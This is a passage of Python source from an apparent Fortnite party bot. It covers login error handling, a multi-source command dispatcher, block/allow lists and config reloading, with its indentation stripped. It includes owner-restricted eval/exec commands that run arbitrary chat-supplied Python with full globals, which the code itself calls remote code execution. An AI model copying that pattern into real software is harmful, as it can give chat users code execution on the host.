Timer(data.get('restart_in'), restart).start()
try:
await fortnitepy.start_multiple(
clients,
all_ready_callback=lambda: send(l("bot"),l("all_login"),green,add_p=lambda x:f'[{now()}] {x}') if len(clients) > 1 else print('')
)
except fortnitepy.AuthException as e:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if "errors.com.epicgames.account.oauth.exchange_code_not_found" in e.args[0]:
send(l("bot"),l("exchange_code_error"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
elif "Invalid device auth details passed." in e.args[0]:
some_detail = e.args[0].split("-")[0].strip()
device_auth_details = get_device_auth_details()
for email,details in device_auth_details.items():
for detail in details.values():
if detail == some_detail:
break
else:
continue
break
else:
email = some_detail
device_auth_details.pop(email.lower())
with open(filename, 'w') as f:
json.dump(device_auth_details, f)
restart()
else:
send(l("bot"),l("login_failed"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
except fortnitepy.HTTPException as e:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if "reset" in e.args[0]:
send(l("bot"),l("password_reset_error"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
else:
send(l("bot"),l("login_failed"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
except KeyboardInterrupt:
sys.exit(1)
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l("failed_to_load_account"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
sys.exit(1)
async def run_app() -> None:
try:
await app.create_server(host=data['web']['ip'], port=data['web']['port'], return_asyncio_server=True, access_log=data['web']['log'])
except OSError:
if data["loglevel"] == "debug":
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l("web_already_running"),red,add_p=lambda x:f'[{now()}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
if data["status"] == 0 or bot_ready is False:
webbrowser.open(f"http://{data['web']['ip']}:{data['web']['port']}")
send(l("bot"),l("web_running",f"http://{data['web']['ip']}:{data['web']['port']}"),add_p=lambda x:f'[{now()}] {x}')
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
#========================================================================================================================
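# process_command is the single dispatcher for every message source: Fortnite
# whispers and party chat, Discord channels, the web panel, and the internal
# AllMessage fan-outs. Multi-line messages are split and re-dispatched one
# line at a time, except for eval/exec, whose bodies must keep their newlines.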
async def process_command(message: Union[fortnitepy.FriendMessage, fortnitepy.PartyMessage, discord.Message, WebMessage, AllMessage]):
global blacklist
global whitelist
global blacklist_
global whitelist_
global otherbotlist
if not message or not message.content:
return
loop = asyncio.get_event_loop()
content = message.content
con = content.split("\n")
if data['caseinsensitive']:
args = jaconv.kata2hira(content.lower()).split()
else:
args = content.split()
content_ = ' '.join(args[1:])
content2_ = ' '.join(args[2:])
rawargs = content.split()
rawcontent = ' '.join(rawargs[1:])
rawcontent2 = ' '.join(rawargs[2:])
check_ownercommand = True
check_ng = True
if len(args) < 1:
return
if isinstance(message, fortnitepy.message.MessageBase):
client = message.client
client.add_cache(message.author)
if "Lupus" in content:
if isinstance(message, fortnitepy.PartyMessage):
await message.author.block()
await message.author.kick()
if ((data['discord']['enabled'] and not dclient.isready)
or (message.author.id in blacklist and data['fortnite']['blacklist-ignorecommand'])
or (message.author.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['ignorebot'])):
return
if ((len(con) > 1)
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
if isinstance(message, fortnitepy.FriendMessage):
if not client.whisper:
if client.whisperperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}]',content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} [{platform_to_str(message.author.platform)}] | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(message, fortnitepy.PartyMessage):
if not client.partychat:
if client.partychatperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
display_name_ = client.is_most()
if display_name_:
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {name(message.author)} | {x}',add_d=lambda x:f'[{l("party")}] [{display_name_}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}]',content,add_p=lambda x:f'[{now()}] [{l("party")}/{client.party.id}] [{display_name_}] {name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}] | {x}',add_d=lambda x:f'[{l("party")}/{client.party.id}] [{display_name_}] {x}')
if content_ in commands['me']:
rawcontent = message.author.id
content_ = message.author.id
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(message, discord.Message):
if ((not isinstance(message.channel, discord.TextChannel))
or (message.author.id == dclient.user.id)
or (message.author.id in blacklist_ and data['discord']['blacklist-ignorecommand'])
or (message.author.bot and data['discord']['ignorebot'])):
return
if any("{name}" not in i and "{id}" not in i and message.channel.name == i for i in data['discord']['channels']):
tasks = {}
for client_ in loadedclients:
mes = AllMessage(content, message.author, client_, message)
task = loop.create_task(process_command(mes))
tasks[client_] = [task, mes]
await asyncio.gather(*[i[0] for i in tasks.values()])
for client_,list_ in tasks.items():
result = list_[1].result.get(client_.user.id)
if result:
results = '\n'.join(result)
await reply(message, client_, f"[{name(client_.user)}] {results}")
return
else:
for clientname, client in client_name.items():
if not client.isready:
continue
if message.channel.name in [i.format(name=clientname, id=client.user.id).replace(" ","-").replace(".","-").replace(",","-").replace("--","-").lower() for i in data["discord"]["channels"]]:
break
else:
return
if not client.discord:
if client.discordperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist_:
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}({dclient.user})] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}({dclient.user})] {x}')
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(message, WebMessage):
client = message.client
if ((data['discord']['enabled'] and not dclient.isready)
or (not client.web)):
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
check_ownercommand = False
check_ng = False
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(message, AllMessage):
client = message.client
if data['discord']['enabled'] and not dclient.isready:
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
base = message.base
while isinstance(base, AllMessage):
base = base.base
if isinstance(base, fortnitepy.message.MessageBase):
client.add_cache(message.author)
if ((message.author.id in blacklist and data['fortnite']['blacklist-ignorecommand'])
or (message.author.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['ignorebot'])):
return
if isinstance(base, fortnitepy.FriendMessage):
if not client.whisper:
if client.whisperperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}]',content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(base, fortnitepy.PartyMessage):
if not client.partychat:
if client.partychatperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
display_name = client.is_most()
if display_name:
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{l("party")}] [{display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}]',content,add_p=lambda x:f'[{now()}] [{l("party")}/{client.party.id}] [{display_name}] {name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}] | {x}',add_d=lambda x:f'[{l("party")}/{client.party.id}] [{display_name}] {x}')
if rawcontent in commands['me']:
rawcontent = message.author.id
content_ = message.author.id
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(base, discord.message.Message):
if ((message.author.id == dclient.user.id)
or (message.author.id in blacklist_ and data['discord']['blacklist-ignorecommand'])
or (message.author.bot and data['discord']['ignorebot'])):
return
if not client.discord:
if client.discordperfect:
return
elif message.author.id not in [owner.id for owner in dclient.owner] and message.author.id not in whitelist_:
return
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}({dclient.user})] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}({dclient.user})] {x}')
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(base, WebMessage):
if ((data['discord']['enabled'] and not dclient.isready)
or (not client.web)):
return
check_ownercommand = False
check_ng = False
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
if not client.isready:
return
display_name = name(client.user)
do_itemsearch = True
if check_ownercommand:
for command in commands['ownercommands']:
if command in ("cid_", "bid_", "petcarrier_", "pickaxe_id_", "eid_", "emoji_", "toy_"):
if args[0].startswith(command):
await reply(message, client, l("this_command_owneronly"))
return
elif command == "item-search":
do_itemsearch = False
elif args[0] in commands[command]:
await reply(message, client, l("this_command_owneronly"))
return
reply_flag = False
for key,value in replies.items():
reply_flag_ = False
if data["replies-matchmethod"] == "contains":
if [k for k in key.split(',') if k in content]:
reply_flag_ = True
elif data["replies-matchmethod"] == "full":
if [k for k in key.split(',') if k == content]:
reply_flag_ = True
elif data["replies-matchmethod"] == "starts":
if [k for k in key.split(',') if content.startswith(k)]:
reply_flag_ = True
elif data["replies-matchmethod"] == "ends":
if [k for k in key.split(',') if content.endswith(k)]:
reply_flag_ = True
if reply_flag_:
reply_flag = True
var = defaultdict(lambda: None)
var.update(client.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"author_display_name": message.author.display_name,
"author_id": message.author.id
}
)
mes = eval_format(value,var)
await reply(message, client, mes)
if check_ng:
flag = False
if data["ng-word-matchmethod"] == "contains":
if [ng for ng in data["ng-words"] if ng in content]:
flag = True
elif data["ng-word-matchmethod"] == "full":
if [ng for ng in data["ng-words"] if ng == content]:
flag = True
elif data["ng-word-matchmethod"] == "starts":
if [ng for ng in data["ng-words"] if content.startswith(ng)]:
flag = True
elif data["ng-word-matchmethod"] == "ends":
if [ng for ng in data["ng-words"] if content.endswith(ng)]:
flag = True
if flag:
if data["ng-word-blacklist"]:
if isinstance(message, fortnitepy.message.MessageBase):
blacklist.append(message.author.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"].append(message.author.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
elif isinstance(message, discord.Message):
blacklist_.append(message.author.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].append(message.author.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
member = client.party.get_member(message.author.id)
if member and client.party.me.leader:
if data["ng-word-kick"]:
try:
await member.kick()
except Exception as e:
if data["loglevel"] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
elif data["ng-word-chatban"]:
try:
await member.chatban()
except Exception as e:
if data["loglevel"] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
return
if reply_flag:
return
if args[0] in commands['prev']:
c = client.prevmessage.get(message.author.id)
if c:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
await task
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
client.prevmessage[message.author.id] = content
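# Note: eval/exec run with the bot's full globals, so they are effectively
# remote code execution; they stay owner-only via ownercommands unless
# explicitly exposed through usercommands.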
if args[0] in commands['eval']:
try:
if rawcontent == "":
await reply(message, client, f"[{commands['eval']}] [{l('eval')}]")
return
variable = globals()
variable.update(locals())
if rawcontent.startswith("await "):
if data['loglevel'] == "debug":
send(display_name,f"await eval({rawcontent.replace('await ','',1)})",yellow,add_d=lambda x:f'```\n{x}\n```')
result = await eval(rawcontent.replace("await ","",1), variable)
send(display_name,str(result))
await reply(message, client, str(result))
else:
if data['loglevel'] == "debug":
send(display_name,f"eval {rawcontent}",yellow,add_d=lambda x:f'```\n{x}\n```')
result = eval(rawcontent, variable)
send(display_name,str(result))
await reply(message, client, str(result))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
elif args[0] in commands['exec']:
try:
if rawcontent == "":
await reply(message, client, f"[{commands['exec']}] [{l('exec')}]")
return
variable = globals()
variable.update(locals())
result = await aexec(content.replace(f"{args[0]} ","",1), variable)
await reply(message, client, str(result))
except Exception as e:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
if data['discord']['enabled']:
if args[0] in commands['addblacklist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['addblacklist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id not in blacklist_:
blacklist_.append(user.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].append(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('discord_blacklist')),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('discord_blacklist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('discord_blacklist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeblacklist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['removeblacklist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id in blacklist_:
blacklist_.remove(user.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].remove(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', f'{name(user)}', l('discord_blacklist')))
else:
await reply(message, client, l('not_list', f'{name(user)}', l('discord_blacklist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l('user_notfound'),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,traceback.format_exc(),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addwhitelist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['addwhitelist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id not in whitelist_:
whitelist_.append(user.id)
data_ = load_json("config.json")
data_["discord"]["whitelist"].append(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('discord_whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('discord_whitelist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('discord_whitelist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removewhitelist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['removewhitelist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id in whitelist_:
whitelist_.remove(user.id)
data_ = load_json("config.json")
data_["discord"]["whitelist"].remove(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', f'{name(user)}', l('discord_whitelist')))
else:
await reply(message, client, l('not_list', f'{name(user)}', l('discord_whitelist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
if args[0] in commands['restart']:
try:
if not client.acceptinvite:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
await reply(message, client, l('restarting'))
Thread(target=restart,args=(0.5,)).start()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['relogin']:
try:
if client.acceptinvite is False:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
await reply(message, client, l('relogining'))
await client.restart()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['reload']:
success = load_config(client)
try:
if success:
await reply(message, client, l('success'))
else:
await reply(message, client, l('error'))
return
try:
if data['fortnite']['avatar_id'] == "{bot}":
client.set_avatar(fortnitepy.Avatar(asset=client.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
else:
client.set_avatar(fortnitepy.Avatar(asset=data['fortnite']['avatar_id'].format(bot=client.party.me.outfit), background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(client.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
client.owner = []
for owner in data['fortnite']['owner']:
user = client.get_user(owner) or client.get_cache_user(owner)
if not user:
try:
user = await client.fetch_user(owner)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("owner_notfound",owner),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
friend = client.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_owner",commands["reload"]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not client.is_pending(user.id):
try:
await client.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
client.owner.append(friend)
send(display_name,f'{l("owner")}: {name(friend)}',green,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if client.owner and data['fortnite']['click_invite']:
for owner in client.owner:
await owner.send(l("click_invite"))
lists = {
"blacklist": "blacklist",
"whitelist": "whitelist",
"otherbotlist": "botlist"
}
async def _(listuser: str) -> None:
user = client.get_user(listuser) or client.get_cache_user(listuser)
if not user:
try:
user = await client.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{data_}_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
if data_ == "blacklist" and data["fortnite"]["blacklist-autoblock"]:
try:
await user.block()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
globals()[list_].append(user.id)
for list_,data_ in lists.items():
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite'][list_]])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f"fortnite {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
lists = [
"outfitmimic",
"backpackmimic",
"pickaxemimic",
"emotemimic"
]
async def _(mimic: str) -> None:
if isinstance(data['fortnite'][mimic],str):
user = client.get_user(data['fortnite'][mimic]) or client.get_cache_user(data['fortnite'][mimic])
if not user:
try:
user = await client.fetch_user(data['fortnite'][mimic])
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{mimic}_user_notfound",data['fortnite'][mimic]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
setattr(client,mimic,user.id)
if data['loglevel'] == "debug":
send(display_name,f"{mimic} {getattr(client,mimic)}",yellow,add_d=lambda x:f'```\n{x}\n```')
try:
await asyncio.gather(*[_(mimic) for mimic in lists])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def _(listuser: str) -> None:
user = client.get_user(listuser) or client.get_cache_user(listuser)
if not user:
try:
user = await client.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("invitelist_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
friend = client.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_inviteuser",listuser,commands["reload"]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not client.is_pending(user.id) and user.id != client.user.id:
try:
await client.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.invitelist.append(friend.id)
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite']['invitelist']])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f'invitelist {client.invitelist}',yellow,add_d=lambda x:f'```\n{x}\n```')
if data['fortnite']['acceptfriend']:
async def _(pending: fortnitepy.IncomingPendingFriend) -> None:
if client.acceptfriend is True:
try:
await pending.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif client.acceptfriend is False:
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
